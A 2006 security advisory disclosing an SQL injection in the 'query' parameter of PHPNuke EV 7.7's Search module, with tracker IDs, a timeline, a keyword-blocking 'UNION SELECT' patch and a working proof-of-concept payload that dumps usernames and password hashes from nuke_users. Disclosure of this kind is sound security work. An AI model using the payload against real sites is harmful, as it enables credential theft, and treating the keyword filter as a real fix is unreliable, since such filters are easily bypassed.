###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....